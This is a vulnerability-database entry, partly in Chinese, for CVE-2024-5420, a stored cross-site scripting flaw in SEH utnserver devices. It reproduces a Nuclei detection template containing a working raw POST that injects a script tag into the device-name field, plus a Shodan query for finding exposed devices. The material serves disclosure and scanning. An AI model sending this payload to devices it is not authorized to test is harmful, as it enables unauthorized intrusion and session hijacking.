CVE-2024-5420: SEH utnserver Pro/ProMAX/INU-100 20.1.22 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: SEH utnserver Pro | POC: 已公开

漏洞描述

A vulnerability was found in utnserver Pro, utnserver ProMAX, and INU-100 version 20.1.22 and earlier, affecting the device description parameter in the web interface. This flaw allows stored cross-site scripting (XSS), enabling attackers to inject JavaScript code. The attack can be executed remotely by tricking victims into visiting a malicious website, potentially leading to session hijacking. This vulnerability is publicly disclosed and identified as CVE-2024-5420.

PoC代码[已公开]

id: CVE-2024-5420

info:
  name: SEH utnserver Pro/ProMAX/INU-100 20.1.22 - Cross-Site Scripting
  author: bl4ckp4r4d1s3
  severity: high
  description: |
    A vulnerability was found in utnserver Pro, utnserver ProMAX, and INU-100 version 20.1.22 and earlier, affecting the device description parameter in the web interface. This flaw allows stored cross-site scripting (XSS), enabling attackers to inject JavaScript code. The attack can be executed remotely by tricking victims into visiting a malicious website, potentially leading to session hijacking. This vulnerability is publicly disclosed and identified as CVE-2024-5420.
  reference:
    - https://cyberdanube.com/en/en-multiple-vulnerabilities-in-seh-untserver-pro/index.html
    - https://seclists.org/fulldisclosure/2024/Jun/4
    - https://nvd.nist.gov/vuln/detail/CVE-2024-5420
    - http://seclists.org/fulldisclosure/2024/Jun/4
    - https://cyberdanube.com/en/en-multiple-vulnerabilities-in-oring-iap420/index.html
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:L
    cvss-score: 8.3
    cve-id: CVE-2024-5420
    cwe-id: CWE-79
    epss-score: 0.35514
    epss-percentile: 0.96954
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"utnserver Control Center"
  tags: cve,cve2024,utnserver,seh,xss,seclists

http:
  - raw:
      - |
        POST /device/description_en.html HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=set&sys_name=%E2%80%9C%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sys_descr=&sys_contact=

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'value="“><script>alert(document.domain)</script>" id="standort"'
          - 'Host name</label>'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a00463044022067becbccfe28f443512084fb0504e8a0d8a8ea908cc18f462d133f05e31a03e502203bf446effd26a29d3f6a93a92efedea6524a113ddcabce5bb24768f79b7205c4:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-5420.yaml

相关漏洞推荐